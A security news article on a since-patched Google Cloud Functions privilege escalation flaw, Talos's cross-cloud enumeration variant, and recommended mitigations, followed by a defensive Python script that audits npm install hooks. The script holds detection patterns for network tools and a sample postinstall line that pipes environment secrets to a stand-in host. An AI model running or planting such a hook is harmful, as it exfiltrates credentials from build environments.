Vulnerability in Google Cloud Functions Raises Significant Security Concerns


A potential privilege escalation vulnerability impacting Google Cloud Platform (GCP) Cloud Functions and its associated Cloud Build service has been identified. This issue, uncovered by Tenable Research, enabled attackers to exploit the deployment processes of GCP Cloud Functions to obtain elevated permissions.

In response to these findings, Google has deployed a patch to address the excessive privileges previously granted to default Cloud Build service accounts.

Attack Technique Repurposed Across Cloud Environments

Cisco Talos has further investigated and replicated the attack technique, evaluating its applicability across various cloud platforms. By setting up a Debian server within GCP utilizing Node Package Manager (NPM) alongside Ngrok, researchers employed a tainted package.json file to extract tokens and simulate an attack. The analysis confirmed that Google’s patch successfully mitigated the original privilege escalation method.

However, Talos demonstrated that the same exploit strategy could be adapted to conduct environment enumeration—a critical reconnaissance tactic for mapping system architecture—without necessitating privileged access. Testing this modified approach across AWS Lambda and Azure Functions validated its general applicability across diverse cloud services.

Enumeration Techniques Observed

The research identified several methods that attackers could use, without elevated privileges, to gather useful information about the system and network configuration of the function's runtime:

– ICMP discovery for network mapping
– Detection of .dockerenv files to ascertain containerized environments
– CPU scheduling inquiries to determine initialization systems
– Analysis of Container ID and mount points to uncover potential escape strategies
– Extraction of operating system and kernel details
– Scanning for users and permissions to facilitate privilege escalation
– Network traffic monitoring to assess vulnerabilities

These techniques can be effectively utilized without requiring elevated credentials, making them applicable even in scenarios where service accounts are properly constrained.

Google Responds and Mitigation Measures Advised

Following Tenable’s report, Google has adapted the behavior of Cloud Build and implemented new policies to enhance service account control. Talos has confirmed that the method of exfiltrating service account tokens is no longer viable within GCP.

To mitigate similar threats, organizations are encouraged to:

– Enforce the principle of least privilege across all service accounts
– Conduct regular audits and monitoring of permissions
– Set alerts for unexpected modifications to Cloud Functions
– Inspect outgoing traffic for potential signs of data exfiltration
– Validate the integrity of third-party NPM packages
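The tainted package.json described above does its work through npm lifecycle hooks that run automatically during the build step of a deployment. As an added example that is not from the article, Tenable or Talos, the following Python audit flags install-time hooks that invoke outbound network tools; the indicator patterns and the sample manifests are constructed assumptions.

```python
import json
import re

# Lifecycle hooks that npm runs on its own during `npm install`, i.e. inside
# the build container of a deployment, with no explicit invocation by the developer.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Constructed indicator list (assumption): tools an install-time script has no
# business calling, such as outbound tunnels and raw network clients.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"\bngrok\b"), "reverse tunnel"),
    (re.compile(r"\b(curl|wget)\b"), "outbound HTTP from install script"),
    (re.compile(r"\b(nc|ncat|netcat)\b"), "raw socket tool"),
    (re.compile(r"\$\{?[A-Z_]*TOKEN[A-Z_]*\}?"), "token-like env var referenced"),
    (re.compile(r"\bbase64\b"), "encoding of data before transfer"),
]


def audit_package_json(text: str) -> list[dict]:
    """Return one finding per install-time lifecycle script that matches an indicator."""
    findings = []
    scripts = json.loads(text).get("scripts", {})
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        reasons = [why for pat, why in SUSPICIOUS_PATTERNS if pat.search(cmd)]
        if reasons:
            findings.append({"hook": hook, "command": cmd, "reasons": reasons})
    return findings


# Constructed sample of a tainted manifest: the postinstall hook fires inside the
# build environment and pushes the process environment to an external host.
SAMPLE_TAINTED = """{
  "name": "hello-function",
  "scripts": {
    "postinstall": "env | base64 | curl -d @- https://example.invalid/drop",
    "start": "node index.js"
  }
}"""

# Constructed clean manifest: only developer-invoked scripts, no install hooks.
SAMPLE_CLEAN = '{"name": "hello-function", "scripts": {"start": "node index.js", "test": "jest"}}'

if __name__ == "__main__":
    for f in audit_package_json(SAMPLE_TAINTED):
        print(f"{f['hook']}: {', '.join(f['reasons'])}\n    {f['command']}")
    print("clean manifest findings:", audit_package_json(SAMPLE_CLEAN))
```

Running this against every function's package.json in CI, before the deployment build starts, turns the "validate third-party NPM packages" recommendation into a concrete gate.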

Despite Google’s resolution of the initial vulnerability, this research underscores the ongoing risks associated with overly permissive configurations and highlights the need for continuous security monitoring across cloud environments.